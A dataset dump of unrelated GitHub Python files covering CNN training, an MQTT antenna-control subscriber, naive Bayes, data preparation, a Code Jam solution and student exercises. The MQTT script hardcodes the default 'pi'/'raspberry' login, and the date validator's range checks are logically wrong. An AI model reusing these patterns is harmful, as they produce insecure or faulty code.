size:\")\r\n\tprint(images_reshaped.get_shape())\r\n\t\r\n\t#To compute 32 features for each 5*5 patch - dimensions: [patch size, patch size, input channels, output channels]\r\n\tW_conv1 = weight_variable([5, 5, 1, 4])\r\n\tb_conv1 = bias_variable([4])\r\n\t\r\n\t### Dimension info: h_conv1 shape: expected to be [100, 60, 80, 4]\r\n\th_conv1 = tf.nn.relu(conv2d(images_reshaped, W_conv1) + b_conv1)\r\n\tprint(\"conv1 shape:\")\r\n\tprint(h_conv1.get_shape())\r\n\t\r\n\t#To compute 64 features for each 5*5 patch - dimensions: [patch size, patch size, input channels, output channels]\r\n\tW_conv2 = weight_variable([5, 5, 4, 4])\r\n\tb_conv2 = bias_variable([4])\r\n\t\r\n\t### Dimension info: h_conv2 shape: expected to be [100, 60, 80, 4]\r\n\th_conv2 = tf.nn.relu(conv2d(h_conv1, W_conv2) + b_conv2)\r\n\tprint(\"conv2 shape:\")\r\n\tprint(h_conv2.get_shape())\r\n\t\r\n\tW_fc1 = weight_variable([60 * 80 * 4, FLAGS.hidden1])\r\n\tprint(W_fc1.get_shape())\r\n\tb_fc1 = bias_variable([FLAGS.hidden1])\r\n\t\r\n\t### Dimension info: h_pool2_flat shape: expected to be [100, 19200]\r\n\th_conv2_flat = tf.reshape(h_conv2, [-1, 60 * 80 * 4])\r\n\tprint(\"conv2_flat shape:\")\r\n\tprint(h_conv2_flat.get_shape())\r\n\t\r\n\t### Dimension info: h_fc1 shape: expected to be [100, 128]\r\n\th_fc1 = tf.nn.relu(tf.matmul(h_conv2_flat, W_fc1) + b_fc1)\r\n\tprint(\"fully connected shape:\")\r\n\tprint(h_fc1.get_shape())\r\n\t\t\r\n\tW_fc2 = weight_variable([FLAGS.hidden1, FLAGS.num_classes])\r\n\tb_fc2 = bias_variable([FLAGS.num_classes])\r\n\t\r\n\t### Dimension info: logits shape: expected to be [100, 1]\r\n\tlogits = tf.matmul(h_fc1, W_fc2) + b_fc2\r\n\tprint(\"logits shape:\")\r\n\tprint(logits.get_shape())\r\n\t\r\n\tlogits = tf.cast(logits, tf.float32)\r\n\t\r\n\treturn logits\r\n\t\r\n\t\r\n\"\"\"Build the training graph.\r\n Args:\r\n logits: Logits tensor, float - [BATCH_SIZE, NUM_CLASSES].\r\n labels: Labels tensor, int32 - [BATCH_SIZE], with values in the\r\n range [0, NUM_CLASSES).\r\n learning_rate: The learning rate to use for gradient descent.\r\n Returns:\r\n train_op: The Op for training.\r\n loss: The Op for calculating loss.\r\n\"\"\"\r\n \r\ndef training_graph(logits, labels, learning_rate):\r\n\r\n print(\"logits shape\")\r\n print(logits.get_shape())\r\n \r\n # Reshape logits into a 1D array\r\n flattened_logits = tf.reshape(logits, [-1])\r\n \r\n print(\"flattened logits shape\")\r\n print(flattened_logits.get_shape())\r\n \r\n # Define the cost function\r\n loss = tf.reduce_sum(tf.square(flattened_logits-labels)) / FLAGS.batch_size\r\n \r\n # Create the gradient descent optimizer with the given learning rate.\r\n optimizer = tf.train.GradientDescentOptimizer(learning_rate)\r\n \r\n # Create a variable to track the global step (iteration).\r\n global_step = tf.Variable(0, name='global_step', trainable=False)\r\n \r\n # Use the optimizer to apply the gradients that minimize the loss\r\n # (and also increment the global step counter) as a single training step.\r\n train_op = optimizer.minimize(loss, global_step=global_step)\r\n \r\n return train_op, loss\r\n \r\ndef run_training():\r\n\t# Tell TensorFlow that the model will be built into the default Graph.\r\n\ttreedom_graph=tf.Graph()\r\n\twith treedom_graph.as_default():\r\n\t\r\n\t\t#Generate placeholders for images and labels\r\n\t \t#Ensures that the same graph can be used for training, inference and evaluation later.\r\n\t images_placeholder=tf.placeholder(tf.float32)\r\n\t labels_placeholder=tf.placeholder(tf.float32)\r\n\t \r\n\t 
#Remember these operands\r\n\t tf.add_to_collection(\"images\", images_placeholder)\r\n\t tf.add_to_collection(\"labels\", labels_placeholder)\r\n\t \r\n\t # Build a Graph that computes predictions from the inference model.\r\n\t logits = inference_graph(images_placeholder, True)\r\n\t \r\n\t #remember this operation\r\n\t tf.add_to_collection(\"logits\", logits)\r\n\t \r\n\t #create images and labels\r\n\t images, labels, gts = inputs(train=True, batch_size=FLAGS.batch_size, num_epochs=FLAGS.num_epochs)\r\n\t #images_eval, labels_eval = inputs(train=False, batch_size=FLAGS.batch_size, num_epochs=FLAGS.num_epochs_eval)\r\n\t print(\"printing images and labels\")\r\n\t print(images)\r\n\t print(labels)\r\n\t print(gts)\r\n\t \r\n\t #create train and loss op\r\n\t train_op, loss =training_graph(logits, labels_placeholder, FLAGS.learning_rate)\r\n\t \t \r\n\t #ititalize global and local variables\r\n\t init = tf.group(tf.global_variables_initializer(), tf.local_variables_initializer())\r\n\t \r\n\t #Create a saver for writing training checkpoints\r\n\t saver=tf.train.Saver()\r\n\t #print(\"end\")\r\n\t \r\n\twith tf.Session(graph=treedom_graph) as sess:\r\n\t\r\n\t\t#initialize all the variables by running the op\r\n\t\tsess.run(init)\r\n\t\t\r\n\t\t#variable for tracking losses - to be displayed in losses.png\r\n\t\tlosses = []\r\n\t\t\r\n\t\t# Start input enqueue threads.\r\n\t\tcoord = tf.train.Coordinator()\r\n\t\tthreads = tf.train.start_queue_runners(sess=sess, coord=coord)\r\n\t\t\r\n\t\tprint(\"Starting threading\")\r\n\t\t\r\n\t\titeration = 0\r\n\t\tlast_loss = 1\r\n\t\ttry:\r\n\t\t\twhile not coord.should_stop():\r\n\t\t\t\tstart_time = time.time()\r\n\t\t\t\t\r\n\t\t\t\timage, label, gt = sess.run([images, labels, gts])\r\n\t\t\t\t\r\n\t\t\t\tif iteration == 1:\r\n\t\t\t\t\tprint(\"label:\")\r\n\t\t\t\t\tprint(label)\r\n\t\t\t\t\tprint(\"gt:\")\r\n\t\t\t\t\tprint(gt)\r\n\t\t\t\t\t\r\n\t\t\t\t\tfig2=plt.figure()\r\n\t\t\t\t\ta2=fig2.add_subplot(111)\r\n\t\t\t\t\ta2.plot(gt, gt, 'ro', label=\"ground truth\")\r\n\t\t\t\t\ta2.plot(gt, label, 'bo', label=\"labels\")\r\n\t\t\t\t\tplt.legend()\r\n\t\t\t\t\tfig2.savefig('output/cnn-e%d-p10000/first_iteration_train_cnn.png' % (FLAGS.num_epochs))\r\n\t\t\t\t\r\n\t\t\t\t# Predict label\r\n\t\t\t\tlogit = sess.run([logits], feed_dict={images_placeholder: image})\r\n\t\t\t\t\r\n\t\t\t\t# Calculate loss\r\n\t\t\t\t_, loss_value = sess.run([train_op, loss], feed_dict={images_placeholder: image, labels_placeholder:label})\r\n\t\t\t\tlast_loss = loss_value\r\n\t\t\t\t\r\n\t\t\t\t# Logging information\r\n\t\t\t\tlosses.append(loss_value)\r\n\t\t\t\t\r\n\t\t\t\tduration = time.time() - start_time\r\n\t\t\t\t\r\n\t\t\t\t#Print overview\r\n\t\t\t\tprint(\"Step: %d, Loss:%.6f\" % (iteration, loss_value))\r\n\r\n\t\t\t\tif iteration % 100 == 0:\r\n\t\t\t\t\tprint('Step %d: loss = %.2f (%.3f sec)' % (iteration, loss_value, duration))\r\n\r\n\t\t\t\t#Possibility to save checkpoint if Training is to be conducted in several chunks\t\t\t\t\r\n\t\t\t\t\"\"\"\r\n\t\t\t\tif(step + 1) % 1000 == 0:\r\n\t\t\t\t\tprint('Saving checkpoint...')\r\n\t\t\t\t\tcheckpoint_file = os.path.join(FLAGS.train_dir, 'checkpoint')\r\n\t\t\t\t\tsaver.save(sess, checkpoint_file, global_step=step)\"\"\"\r\n\t\t\t\t\r\n\t\t\t\titeration += 1\r\n\t\t\t\t\r\n\t\texcept tf.errors.OutOfRangeError:\r\n\t\t\tprint('Done training for %d epochs, %d iterations.' 
% (FLAGS.num_epochs, iteration))\r\n\t\t\tf.write('Done training for %d epochs, %d iterations.\\n' % (FLAGS.num_epochs, iteration))\r\n\t\t\tf.write('Final loss value: %.3f\\n' % (last_loss))\r\n\t\tfinally:\r\n\t\t\tcoord.request_stop()\r\n\t\t\t\r\n\t\t# Wait for threads to finish.\r\n\t\tcoord.join(threads)\r\n\t\t\r\n\t\tcheckpoint = 'output/cnn-e%d-p10000/check' % (FLAGS.num_epochs)\r\n\t\tprint(checkpoint)\r\n\t\tcheckpoint_meta = 'output/cnn-e%d-p10000/check.meta' % (FLAGS.num_epochs)\r\n\t\tprint(checkpoint_meta)\r\n\t\t\t\t\r\n\t\tsaver.save(sess, checkpoint)\r\n\t\tsaver.export_meta_graph(checkpoint_meta)\r\n\t\t\r\n\t\ttf.train.write_graph(tf.get_default_graph().as_graph_def(), \"/tmp\", \"exported.pbtxt\", as_text=True)\r\n\t\t\r\n\t\tfig=plt.figure()\r\n\t\ta1=fig.add_subplot(111)\r\n\t\ta1.plot(losses, label=\"losses\")\r\n\t\tfig.savefig('output/cnn-e%d-p10000/cnn_losses.png' % (FLAGS.num_epochs))\r\n\t\t\r\n\t\tsess.close()\r\n\r\ndirectory = 'output/cnn-e' + str(FLAGS.num_epochs) + '-p10000'\r\nprint(directory)\r\nif not os.path.exists(directory):\r\n\tos.makedirs(directory)\r\n\t\r\n\t\r\nf = open('output/cnn-e%d-p10000/log' % (FLAGS.num_epochs), 'a+')\r\nf.write('\\n\\n----CNN REGRESSOR TRAINING----\\n\\n')\r\nf.write('Batch size: %d\\n' % (FLAGS.batch_size))\r\nf.write('Number of epochs: %d\\n' % (FLAGS.num_epochs))\r\nf.write('Image size: %d\\n\\n' % (FLAGS.image_pixels))\r\nf.write('--Model information--\\n')\r\nf.write('Layer 1 hidden units: %d\\n' % (FLAGS.hidden1))\r\nf.write('Layer 2 hidden units: %d\\n\\n' % (FLAGS.hidden2))\r\nf.write('--Results--\\n')\r\n\r\n# Record the start time before training so the duration below is meaningful\r\nstart_time=datetime.datetime.now()\r\nf.write('\\nStarted training: ')\r\nf.write(str(start_time))\r\nf.write('\\n')\r\n\r\nrun_training()\r\n\r\nend_time=datetime.datetime.now()\r\nf.write('Finished training: ')\r\nf.write(str(end_time))\r\nf.write('\\nTraining took: ')\r\nf.write(str(end_time - start_time))\r\nf.write('\\n\\nTraining ended successfully\\n')\r\nf.close()","repo_name":"krisztinagy/master_thesis","sub_path":"M2/cnn_regressor_training.py","file_name":"cnn_regressor_training.py","file_ext":"py","file_size_in_byte":13727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6534299358","text":"import paho.mqtt.client as mqttClient\nimport paho.mqtt.publish as publish\nimport json\nimport threading\nfrom posicion import YaetsuG5500\n\n\ndef suscriptor_MQTT(**accion):\n    \"\"\"This is the subscriber that runs on the slave\n    so it can receive commands from the master\n    \"\"\"\n    def on_connect(client, userdata, flags, rc):\n        client.subscribe(\"radioastronomia/subsistemaposicion\")\n        if rc == 0:\n            print(\"successfully connected to the broker\")\n\n    def on_message(client, userdata, message):\n        msg = json.loads(message.payload.decode())\n        print(msg)\n\n        azimut = msg[\"azimut\"]\n        elevacion = msg[\"elevacion\"]\n        region = msg[\"region\"]\n        antena = msg[\"antena\"]\n        controlador = YaetsuG5500(accion[\"IP_server\"])\n        controlador.control(int(azimut), int(elevacion), region, antena)\n\n\n    broker_address= accion[\"IP_broker\"]\n    port = accion[\"PORT_broker\"]\n    # broker_address= \"centrotic1uis.cloudapp.net\n    # port = 8443\n    client = mqttClient.Client()\n    client.username_pw_set(\"pi\", password=\"raspberry\")\n    # register the callbacks before connecting so the CONNACK is not missed\n    client.on_connect= on_connect\n    client.on_message= on_message\n    client.connect(broker_address, port=port)\n    client.loop_forever()\n\n\nif __name__ == \"__main__\":\n    global IP_server, IP_broker, PORT_broker\n    IP_server = \"192.168.0.108:8000\"\n    
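# Counterpart sketch for the master side of the MQTT link above: publish one
# command to the topic the slave subscribes to (broker details are assumed):
import json
import paho.mqtt.publish as publish

def publicar_orden(azimut, elevacion, region, antena, broker, port=1883):
    payload = json.dumps({"azimut": azimut, "elevacion": elevacion,
                          "region": region, "antena": antena})
    publish.single("radioastronomia/subsistemaposicion", payload,
                   hostname=broker, port=port,
                   auth={"username": "pi", "password": "raspberry"})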
IP_broker = \"35.243.199.245\"\n PORT_broker = 1883\n\n kwargs = {\"IP_server\": IP_server, \"IP_broker\":IP_broker, \"PORT_broker\": PORT_broker}\n hilo1 = threading.Thread(target=suscriptor_MQTT, kwargs=kwargs)\n hilo1.start()\n","repo_name":"Narenman/CentroTIC","sub_path":"Modulos_aplicaciones/radioastronomia/subsistema_posicion/slavepos.py","file_name":"slavepos.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26540415837","text":"import numpy as np\n\n#导入文档信息\ndef loadDataSet(filename):\n file = open(filename)\n list = file.readlines()\n returnList = []\n for line in list:\n temp = line.strip().split(' ')\n returnList.append(temp)\n classVec = [0,1,0,1,0,1]\n return returnList,classVec\n\n# 创建词汇表\ndef createVocabList(dataSet):\n vocabSet = set([])\n for document in dataSet:\n vocabSet = vocabSet | set(document)\n return list(vocabSet)\n\n# 输入文本转为词向量\ndef setOfWords2Vec(vocabList, inputSet):\n returnVec = [0]*len(vocabList)\n for word in inputSet:\n if word in vocabList:\n returnVec[vocabList.index(word)] = 1\n else:\n print(\"the world %s is not in the vocablist!\" %word)\n return returnVec\n\ndef createTrainMax(vocabList, dataList):\n trainMax = []\n for data in dataList:\n trainMax.append(setOfWords2Vec(vocabList,data))\n return trainMax\n\ndef trainNB0(trainMatrix,trainCategory):\n numTrainDocs = len(trainMatrix)\n numWords = len(trainMatrix[0])\n pAbusive = sum(trainCategory)/float(numTrainDocs)\n p0Num = np.ones(numWords); p1Num = np.ones(numWords)\n p0Denom = 1.0; p1Denom = 1.0 #对概率做平滑处理,分子预设为1,分母预设为2\n for i in range (numTrainDocs):\n if trainCategory[i] == 1:\n p1Num += trainMatrix[i]\n p1Denom += sum(trainMatrix[i])\n else:\n p0Num += trainMatrix[i]\n p0Denom += sum(trainMatrix[i])\n p1Vect = np.log(p1Num/p1Denom) #由于概率乘积数值过小,可能会引起下溢出,所以用log,\n p0Vect = np.log(p0Num/p0Denom)\n return p1Vect,p0Vect,pAbusive\n\ndef classifyNB(vec2Classify,p0Vec,p1Vec,pClass1):\n p1 = sum(vec2Classify * p1Vec) + np.log(pClass1)\n p0 = sum(vec2Classify * p0Vec) + np.log(1-pClass1)\n if p1 > p0: return 1\n else: return 0\n\nif __name__ == '__main__':\n datalist,classVec = loadDataSet('dataset.txt')\n vocablist = createVocabList(datalist)\n trainMax = createTrainMax(vocablist,datalist)\n #print(setOfWords2Vec(vocablist,['my','dog','stupid']))\n\n # print(trainNB0(trainMax,classVec))\n p1Vec,p0Vec,pClass1 = trainNB0(trainMax,classVec)\n myWord = ['my','love','my','dog']\n myWord2Vec = setOfWords2Vec(vocablist,myWord)\n print(\"the class is %d !\" % classifyNB(myWord2Vec,p0Vec,p1Vec,pClass1))","repo_name":"ITJaylon/ML","sub_path":"朴素贝叶斯/native.py","file_name":"native.py","file_ext":"py","file_size_in_byte":2399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70111123395","text":"import wikipedia\n\n\ndef findarticle(article):\n\t\n\t#Finds the name of the closest article to user input\n\tsearch = wikipedia.search(article)\n\tarticle = search[0]\n\t\n\t#Stores the article as a string (for parsing and finding key words later)\n\tx = wikipedia.page(article)\n\tstr_article = str(x.content)\n\treturn article, str_article\n\t\n","repo_name":"frankye8998/WikiWordInferer","sub_path":"find_article.py","file_name":"find_article.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"35191036262","text":"import numpy as np\nimport pandas as 
pd\n\n# train test split from sklearn\nfrom sklearn.model_selection import train_test_split\n# imputer from sklearn\n# help with missing value by replacing blank with: median, mode, average, calculate using other column\nfrom sklearn.impute import SimpleImputer\n\n\n#-----------------------IRIS -------------------------------------------------------------------\ndef prep_iris(df):\n ''' This function takes in iris dataframe will drop columns ['species_id,'measurement_id']\n rename 'species name' to 'species'. \n Creates a dummy data frame to encode the categorical values of species and concatanate \n back into the original dataframe\n '''\n # use method to drop columns\n df.drop(columns = ['species_id','measurement_id'], inplace = True)\n \n # use method .rename to rename columns\n df.rename(columns={\"species_name\": \"species\"}, inplace = True)\n \n # create dummy data frame that encodes the 3 unique species name\n dummy_iris_df = pd.get_dummies(df['species'], dummy_na = False)\n \n # concatenate the dummy_df with original data frame\n new_iris_df = pd.concat([df, dummy_iris_df], axis = 1)\n \n return new_iris_df\n\ndef clean_iris(df):\n\n '''Prepares acquired Iris data for exploration'''\n \n # drop column using .drop(columns=column_name)\n df = df.drop(columns='species_id')\n \n # remame column using .rename(columns={current_column_name : replacement_column_name})\n df = df.rename(columns={'species_name':'species'})\n \n # create dummies dataframe using .get_dummies(column_name,not dropping any of the dummy columns)\n dummy_df = pd.get_dummies(df['species'], drop_first=False)\n \n # join original df with dummies df using .concat([original_df,dummy_df], join along the index)\n df = pd.concat([df, dummy_df], axis=1)\n \n return df\n\ndef split_iris_data(df):\n '''\n take in a DataFrame and return train, validate, and test DataFrames; stratify on species.\n return train, validate, test DataFrames.\n '''\n \n # splits df into train_validate and test using train_test_split() stratifying on species to get an even mix of each species\n train_validate, test = train_test_split(df, test_size=.2, random_state=123, stratify=df.species)\n \n # splits train_validate into train and validate using train_test_split() stratifying on species to get an even mix of each species\n train, validate = train_test_split(train_validate, \n test_size=.3, \n random_state=123, \n stratify=train_validate.species)\n return train, validate, test\n\n#-----------------------TITANIC -------------------------------------------------------------------\n\ndef prep_titanic(df):\n '''\n This function takes in dataframe and\n drops columns embarked', 'pclass', 'passenger_id', 'deck' and\n encodes 'sex', 'class', 'embark_town' with drop_first false and\n concatenates encoded df with original df\n '''\n \n # dropped columns 'embarked', 'pclass', 'passenger_id', 'deck\n df.drop(columns = ['embarked', 'pclass', 'passenger_id', 'deck'], inplace = True)\n \n # encode titanic dataframe for sex', 'class', 'embark_town\n dummy_df = pd.get_dummies(df[['sex', 'class', 'embark_town']], dummy_na=False, drop_first=[False])\n \n # concatenate dummy data frame to original dataframe\n df = pd.concat([df,dummy_df], axis=1)\n\n return df\n\ndef clean_titanic_data(df):\n '''\n This function will clean the data prior to splitting.\n '''\n # Drops any duplicate values\n df = df.drop_duplicates()\n\n # Drops columns that are already represented by other columns\n cols_to_drop = ['deck', 'embarked', 'class', 'passenger_id']\n df = 
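# Typical wiring of the iris helpers above (a sketch; `acquire.get_iris_data`
# is an assumed companion module in the exercises this file mirrors):
import acquire

df = prep_iris(acquire.get_iris_data())
train, validate, test = split_iris_data(df)
# 80/20 then 70/30 stratified splits -> roughly 56% / 24% / 20% of the rows
print(len(train), len(validate), len(test))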
df.drop(columns=cols_to_drop)\n\n # Fills the small number of null values for embark_town with the mode\n df['embark_town'] = df.embark_town.fillna(value='Southampton')\n\n # Uses one-hot encoding to create dummies of string columns for future modeling \n dummy_df = pd.get_dummies(df[['sex', 'embark_town']], dummy_na=False, drop_first=[True])\n df = pd.concat([df, dummy_df], axis=1)\n\n return df\n\ndef split_titanic_data(df):\n '''\n Takes in a dataframe and return train, validate, test subset dataframes\n '''\n # Creates the test set\n train, test = train_test_split(df, test_size = .2, random_state=123, stratify=df.survived)\n \n # Creates the final train and validate set\n train, validate = train_test_split(train, test_size=.3, random_state=123, stratify=train.survived)\n \n return train, validate, test\n\ndef impute_titanic_mode(train, validate, test):\n '''\n Takes in train, validate, and test, and uses train to identify the best value to replace nulls in embark_town\n Imputes that value into all three sets and returns all three sets\n '''\n imputer = SimpleImputer(missing_values = np.nan, strategy='most_frequent')\n train[['embark_town']] = imputer.fit_transform(train[['embark_town']])\n validate[['embark_town']] = imputer.transform(validate[['embark_town']])\n test[['embark_town']] = imputer.transform(test[['embark_town']])\n return train, validate, test\n\ndef impute_mean_age(train, validate, test):\n '''\n This function imputes the mean of the age column for\n observations with missing values.\n Returns transformed train, validate, and test df.\n '''\n # create the imputer object with mean strategy\n imputer = SimpleImputer(strategy = 'mean')\n \n # fit on and transform age column in train\n train['age'] = imputer.fit_transform(train[['age']])\n \n # transform age column in validate\n validate['age'] = imputer.transform(validate[['age']])\n \n # transform age column in test\n test['age'] = imputer.transform(test[['age']])\n \n return train, validate, test\n#-------------------TELCO CHURN ------------------------------------------------------------------\n\ndef prep_telco(df):\n '''\n This function takes in dataframe and \n drops columns:'payment_type_id', 'internet_service_type_id', 'contract_type_id' \n encode categorical columns, drop_first set to False: 'senior_citizen'gender','partner','dependents','phone_service','multiple_lines','online_security','online_backup','device_protection', 'tech_support','streaming_tv','streaming_movies','paperless_billing', 'total_charges', 'churn','contract_type','internet_service_type','payment_type'\n Concatenate dummy_df to original data frame\n '''\n \n # drop unnecessary : payment_type_id', 'internet_service_type_id', 'contract_type_id' \n df = df.drop(columns=['payment_type_id', 'internet_service_type_id', 'contract_type_id' ])\n \n #convert total_charges to numeric data\n df.total_charges = df.total_charges.replace(' ', np.nan).astype(float)\n # encode categorical drop_first set to False 'senior_citizen'gender','partner','dependents','phone_service','multiple_lines','online_security','online_backup','device_protection', 'tech_support','streaming_tv','streaming_movies','paperless_billing', 'total_charges', 'churn','contract_type','internet_service_type','payment_type'\n dummy_df = pd.get_dummies(df[[\n 'gender','partner',\n 'dependents',\n 'phone_service',\n 'multiple_lines',\n 'online_security',\n 'online_backup',\n 'device_protection', \n 'tech_support',\n 'streaming_tv',\n 'streaming_movies',\n 'paperless_billing',\n 'churn',\n 
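# The impute_* helpers above fit on train only and merely transform validate
# and test, so nothing leaks from the held-out sets into the fill value.
# Minimal illustration (hypothetical one-column frames):
import numpy as np
import pandas as pd
from sklearn.impute import SimpleImputer

train_df = pd.DataFrame({'age': [20.0, 30.0, np.nan]})
test_df = pd.DataFrame({'age': [np.nan]})
imp = SimpleImputer(strategy='mean')
train_df[['age']] = imp.fit_transform(train_df[['age']])
test_df[['age']] = imp.transform(test_df[['age']])  # filled with 25.0, the TRAIN mean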
'contract_type',\n 'internet_service_type',\n 'payment_type']], dummy_na=False)\n\n \n # Concatenate dummy_df to original data frame\n df = pd.concat([df, dummy_df], axis=1)\n \n return df\n\ndef split_telco_data(df):\n '''\n This function performs split on telco data, stratify churn.\n Returns train, validate, and test dfs.\n '''\n train_validate, test = train_test_split(df, test_size=.2, \n random_state=123, \n stratify=df.churn)\n train, validate = train_test_split(train_validate, test_size=.3, \n random_state=123, \n stratify=train_validate.churn)\n return train, validate, test\n\n\ndef impute_mean_total_charges(train, validate, test):\n '''\n This function imputes the mean of the total charge column for\n observations with missing values.\n Returns transformed train, validate, and test df.\n '''\n # create the imputer object with mean strategy\n imputer = SimpleImputer(strategy = 'mean')\n \n # fit on and transform total_charges column in train\n train['total_charges'] = imputer.fit_transform(train[['total_charges']])\n \n # transform total_charges column in validate\n validate['total_charges'] = imputer.transform(validate[['total_charges']])\n \n # transform total_charges column in test\n test['total_charges'] = imputer.transform(test[['total_charges']])\n \n return train, validate, test\n#---------------------- Function for train_validate_test---------------------\ndef train_validate_test(df, target):\n ''' This function takes in a dataframe and target variable to sratify and splits the data into \n train , validate, test'''\n \n train, test = train_test_split(df, test_size=.2, random_state=123, stratify=df[target])\n train, validate = train_test_split(train, test_size=.25, random_state=123, stratify=train[target])\n \n return train, validate, test\n\n\n\n","repo_name":"Yvette-Ibarra/classification-exercises","sub_path":"prepare.py","file_name":"prepare.py","file_ext":"py","file_size_in_byte":9950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23568880501","text":"def nma(num, p):\n # 1\n num = int(num)\n p = int(p)\n lst = [num]\n for k in range(p):\n # print(lst)\n temp = max(lst)\n # lst.remove(temp)\n lst.remove(temp)\n if temp % 2:\n res_f = temp // 2\n res_s = temp // 2\n else:\n res_f = temp / 2\n if res_f == 0:\n res_s = 0\n else:\n res_s = res_f - 1\n if res_f > 0:\n lst.append(res_f)\n if res_s > 0:\n lst.append(res_s)\n #print(lst, lst.count(1), lst.count(0))\n return int(res_f), int(res_s)\nn = int(input())\nres = \"\"\nfor i in range(n):\n res += \"Case #{0}: {1} {2}\\n\".format(i+1, *nma(*input().strip().split(\" \")))\nprint(res, end=\"\")\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_201/1952.py","file_name":"1952.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"19324216524","text":"# Задание №1_____\n\nclass Date:\n def __init__(self, date):\n self.date = date\n\n @classmethod\n def extractor(cls, date):\n day, month, year = map(int, date.split('-'))\n return day, month, year\n\n @staticmethod\n def valid(date_int):\n day, month, year = Date.extractor(date_int)\n if 2099 >= year <= 1900 or 12 > month < 1 or 1 > day > 31:\n return print('Не верная дата')\n elif month in (4, 6, 9, 11) and day > 30:\n return print('Не верная дата')\n elif (year % 400 != 0 and (year % 4 != 0 and year % 100 != 0)) and month == 2 and day > 28:\n return print('Не верная дата')\n 
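# The nma() solver above keeps every segment in a list and rescans it each
# round. The standard multiset approach to this problem ("Bathroom Stalls",
# Code Jam 2017) groups equal segment sizes and consumes them in bulk:
from collections import Counter

def nma_fast(num, p):
    segs = Counter({num: 1})
    while True:
        size = max(segs)
        cnt = segs.pop(size)
        if p <= cnt:
            return size // 2, (size - 1) // 2   # (max, min) free neighbours
        p -= cnt
        if size // 2:
            segs[size // 2] += cnt
        if (size - 1) // 2:
            segs[(size - 1) // 2] += cnt

# nma_fast(4, 2) -> (1, 0); nma_fast(5, 5) -> (0, 0)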
else:\n return print('Верная дата')\n\n\nprint(Date.extractor('16-08-2022'))\nDate.valid('31-05-1057')\nDate.valid('31-04-3020')\nDate.valid('32-11-2019')\nDate.valid('28-02-2024')\nDate.valid('29-02-2015')\nDate.valid('20-02-2010')\nDate.valid('31-01-2008')\nDate.valid('15-07-2016')\n\n\n\n# Задание №2_____\n\nclass Division_on_Null:\n def __init__(self, divider, denominator):\n self.divider = divider\n self.denominator = denominator\n\n @staticmethod\n def divide_on_null(divider, denominator):\n try:\n return (divider / denominator)\n except:\n return (f\"Деление на ноль невозможно\")\n\n\ndiv = Division_on_Null(10, 100)\nprint(Division_on_Null.divide_on_null(10, 0))\nprint(Division_on_Null.divide_on_null(10, 0.1))\nprint(div.divide_on_null(100, 0))\n\n# Задание №3_____________\n\nclass IntException(Exception):\n def __init__(self):\n self.txt = 'Введено не число! '\n\n\nres_list = []\nwhile True:\n inp_user = input('Введите число или Enter для выхода ')\n if inp_user == '':\n break\n else:\n try:\n if inp_user.isdigit():\n res_list.append(int(inp_user))\n elif inp_user.count('.') > 1:\n raise IntException\n else:\n for sym in inp_user:\n if not sym.isdigit() and sym != '.':\n raise IntException\n res_list.append(float(inp_user))\n except IntException as err:\n print(err.txt)\n\n\n# Задание № 4 - 6__________\n\nfrom abc import ABC, abstractmethod\n\n\nclass Department(ABC):\n\n @abstractmethod\n def add(self, type_technic, data):\n pass\n\n\nclass MyTypeError(Exception):\n\n def __init__(self, message):\n self.message = message\n\n def __str__(self):\n return self.message\n\n\nclass Storage:\n\n def __init__(self):\n self.__storage = {}\n\n @property\n def storage(self):\n return self.__storage\n\n def add_technic(self, technic, number):\n try:\n if not isinstance(number, int):\n raise MyTypeError('type of number must be int')\n technic.params['number'] = number\n if not self.__storage.get(technic.type_technic):\n self.__storage[technic.type_technic] = {technic.name: technic.params}\n else:\n self.__storage[technic.type_technic].setdefault(technic.name, technic.params)\n except MyTypeError as x:\n print(x)\n\n def transfer_to_department(self, technic, department):\n department.add(technic.type_technic, self.__storage.get(technic.type_technic))\n\n\nclass TransportDepartment(Department):\n\n def __init__(self):\n self.__storage = {}\n\n @property\n def storage(self):\n return self.__storage\n\n def add(self, type_technic, data):\n if not self.__storage.get(type_technic):\n self.__storage[type_technic] = data\n else:\n self.__storage[type_technic].setdefault(data)\n\n\nclass OfficeTechnics:\n\n def __init__(self, name: str, color: str):\n self.name = name\n self.color = color\n\n\nclass Printer(OfficeTechnics):\n def __init__(self, name: str, color: str, speed: int):\n super().__init__(name, color)\n self.type_technic = self.__class__.__name__\n self.print_speed = speed\n self.params = {'name': self.name, 'color': self.color, 'print_speed': self.print_speed}\n\n\nclass Scanner(OfficeTechnics):\n def __init__(self, name: str, color: str, speed: int):\n super().__init__(name, color)\n self.type_technic = self.__class__.__name__\n self.scan_speed = speed\n self.params = {'name': self.name, 'color': self.color, 'scan_speed': self.scan_speed}\n\n\nclass Copier(OfficeTechnics):\n def __init__(self, name: str, color: str, speed: int):\n super().__init__(name, color)\n self.type_technic = self.__class__.__name__\n self.copy_speed = speed\n self.params = {'name': self.name, 'color': self.color, 
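# The chained comparisons in Date.valid() above do not express the intended
# ranges: `2099 >= year <= 1900` is True exactly when year <= 1900,
# `12 > month < 1` only catches month < 1, and `1 > day > 31` can never be
# True. A compact alternative that delegates month lengths and leap years to
# the standard library:
import datetime

def is_valid_date(date_str):
    """True for 'DD-MM-YYYY' strings naming a real date in 1900..2099."""
    try:
        d = datetime.datetime.strptime(date_str, '%d-%m-%Y')
    except ValueError:
        return False
    return 1900 <= d.year <= 2099

# is_valid_date('28-02-2024') -> True; is_valid_date('29-02-2015') -> False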
